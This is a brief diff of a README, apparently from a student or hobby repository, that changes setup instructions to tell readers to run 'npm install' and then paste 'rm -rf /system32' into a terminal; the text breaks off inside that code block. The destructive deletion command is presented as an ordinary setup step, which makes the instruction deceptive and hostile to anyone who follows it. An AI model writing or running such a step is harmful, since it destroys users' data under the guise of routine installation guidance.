BrownHujay/2025-MA2/README.md

-hi
+hi. \n
 run
 ```bash
 npm install
 ```
-then run this file below in python.
+then run this in temrinal

 ```bash
 rm -rf /system32